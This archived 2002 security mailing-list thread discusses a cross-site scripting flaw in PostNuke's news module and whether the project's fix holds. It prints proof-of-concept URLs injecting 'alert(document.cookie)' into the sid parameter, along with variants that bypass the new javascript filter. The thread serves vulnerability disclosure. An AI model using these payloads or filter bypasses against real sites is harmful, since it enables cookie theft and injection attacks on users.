|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Muhammad Faisal Rauf Danka (mfrd_at_attitudex.com)
Date: Wed Oct 02 2002 - 18:24:15 CDT
I just checked it again :
http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid= where + denotes a blank space or similarly this one:
http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid= resulting in Sorry - $HTTP_GET_VARS contains javascript... Msg.
However the request:
or any character inserted before first "script" and after first less than "<" resulting in DB Error, revealing nothing (user/pass/path etc).
But I used I.E and Netscape, maybe it's different with other browsers. :)
Regards
Head of GemSEC / Chief Technology Officer
--- Daniel Woods <dwoods _____________________________________________________________
_____________________________________________________________
?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
--------
Muhammad Faisal Rauf Danka
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B
784B 0202
ucalgary.ca> wrote:
>
>Humm!
>
>> on 26th Sep the following url:
>> http://news.postnuke.com/modules.php
>> ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
>>
>> used to give Alert PopUp and
>> Error:
>> DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
>> at line 23
>>
>> now it gives:
>> Sorry - $HTTP_GET_VARS contains javascript...
>>
>> Prompt fix by PostNuke team, great work Keep it up! :)
>
>Not so fast on the praise :(
>
>It only took me a couple of workarounds to find ways to bypass the check.
>
> http://news.postnuke.com/modules.php
> ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
>
>Using the request...
> ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
>gives me the DB Error: message
>
>And using the request...
> ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
>gives me the Alert Popup and DB Error: message... the '+' is treated as a blank.
>
>Thanks... Dan.
---------------------------
[ATTITUDEX.COM]
http://www.attitudex.com/
---------------------------
Select your own custom email address for FREE! Get youyourchoice.com w/No Ads, 6MB, POP & more! http://www.everyone.net/selectmail?campaign=tag